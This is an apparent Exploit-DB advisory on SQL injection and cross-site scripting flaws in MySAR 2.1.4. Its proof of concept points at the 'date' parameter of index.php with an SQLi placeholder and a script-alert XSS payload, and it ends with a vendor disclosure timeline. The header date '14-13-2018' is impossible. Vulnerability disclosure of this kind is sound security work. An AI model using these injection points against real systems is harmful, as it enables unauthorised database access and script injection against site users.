MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting

Author: Keerati T.
type: webapps
platform: php
port: 80.0
date_added: 2018-04-18 
date_updated: 2018-09-18 
verified: 1 
codes:  
tags: SQL Injection (SQLi)
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt44500/44483.png 
application_url: http://www.exploit-db.commysar-2.1.4.tar.gz

# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities
# Date: 14-13-2018
# Software Link: https://sourceforge.net/projects/mysar/
# Exploit Author: Keerati T.
# Version: 2.1.4
# Tested on: Linux

1. Description
SQL injection and Cross site script vulnerabilities are found on ALL
parameter of MySAR.

2. Proof of Concept
FOR EXAMPLE
- SQL injection
http://server/mysar/index.php?a=IPSummary&date=[SQLi]
-XSS
http://server/mysar/index.php?a=IPSummary&date=2018-04-14
"><script>alert(1)</script>

3. Timeline
8-3-2018 - Report on their Github. (
https://github.com/coffnix/mysar-ng/issues/12)
-- 1 month later, no any response from vendor. --
14-4-2018 - Public.